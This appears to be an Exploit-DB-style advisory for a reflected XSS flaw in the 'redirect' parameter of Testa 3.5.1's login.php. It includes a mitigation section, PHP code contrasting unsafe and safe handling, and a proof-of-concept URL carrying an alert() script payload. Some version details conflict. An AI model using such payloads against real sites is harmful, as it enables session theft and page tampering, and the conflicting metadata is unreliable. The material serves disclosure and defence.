Vendor: Testa
By: Ashkan Moghaddas
CVSS: 8.8 (HIGH)
Vulnerability: Reflected Cross-Site Scripting (XSS)
CWE: 79
Product Name: Testa
Affected Version From: 3.5.2001
Affected Version To: 3.5.2001
Patch Exists: NO
Related CWE:
CPE: a:testa:testa:3.5.1
Metasploit:
Other Scripts:
Platforms Tested: Windows/Linux
Year: 2022

Testa 3.5.1 Online Test Management System – Reflected Cross-Site Scripting (XSS)

Testa 3.5.1 is vulnerable to reflected Cross-Site Scripting (XSS). The 'redirect' parameter of the 'login.php' page is reflected into the response without sanitization, so an attacker can place JavaScript in it. When a user opens a crafted 'login.php' URL, the injected script runs in that user's browser.

Mitigation:

Input validation should be used to prevent XSS attacks. The application should validate the 'redirect' parameter (and all other user-supplied input) and reject values it does not expect, rather than reflecting them into the page unmodified.
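As an added illustration of that mitigation (example code, not Testa's source; the assumption that login.php reflects 'redirect' into a hidden form field, and the function names, are mine), here is the vulnerable pattern beside a hardened version that validates the redirect target and encodes it for the HTML attribute context:

```php
<?php
// Added example, not Testa's code. It assumes login.php reflects the
// "redirect" query parameter into a hidden form field so the user can be
// sent back after logging in; the unsafe function below is that assumed
// pattern, the safe one shows the fix.

// Unsafe: the raw value is concatenated into an attribute. A value that
// begins with "> closes the attribute and the tag, so what follows is
// parsed as page markup instead of as data.
function render_redirect_field_unsafe(string $redirect): string
{
    return '<input type="hidden" name="redirect" value="' . $redirect . '">';
}

// Validation: accept only a relative, same-site path made of a small
// character set; fall back to a fixed default otherwise. Rejecting "//",
// "..", and anything with a scheme also blocks open-redirect abuse.
function validate_redirect(string $redirect, string $default = 'index.php'): string
{
    if ($redirect === ''
        || !preg_match('#\A[A-Za-z0-9_./?=&-]{1,200}\z#', $redirect)
        || strpos($redirect, '//') !== false
        || strpos($redirect, '..') !== false) {
        return $default;
    }
    return $redirect;
}

// Safe: validate first, then HTML-encode for the attribute context as
// defense in depth. ENT_QUOTES converts both " and ' so the value can
// never terminate the attribute even if the allowlist is later relaxed.
function render_redirect_field_safe(string $redirect): string
{
    $clean   = validate_redirect($redirect);
    $encoded = htmlspecialchars($clean, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="hidden" name="redirect" value="' . $encoded . '">';
}

// Demonstration. PHP has already URL-decoded $_GET values, so the
// advisory's payload arrives as the literal string below (constructed
// here rather than read from the request).
$payload = '"><script>alert("Ultraamooz.com")</script>';
echo "unsafe: ", render_redirect_field_unsafe($payload), PHP_EOL;
echo "safe:   ", render_redirect_field_safe($payload), PHP_EOL;
echo "safe:   ", render_redirect_field_safe('exam.php?id=7'), PHP_EOL;
```

The payload fails the allowlist and is replaced by the default target, while a plain same-site path such as exam.php?id=7 passes through unchanged.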
Source

Exploit-DB raw data:

# Exploit Title: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)
# Date: 28/08/2022
# Exploit Author: Ashkan Moghaddas
# Vendor Homepage: https://testa.cc
# Software Link: https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip
# Version: 3.5.1
# Tested on: Windows/Linux

# Proof of Concept:
# 1- Install Testa 3.5.1
# 2- Go to https://localhost.com/login.php?redirect=XXXX
# 3- Add payload to the Tab, the XSS Payload:
%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E
# 4- XSS has been triggered.

# Go to this url "https://localhost.com/login.php?redirect=%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E"
# XSS will trigger.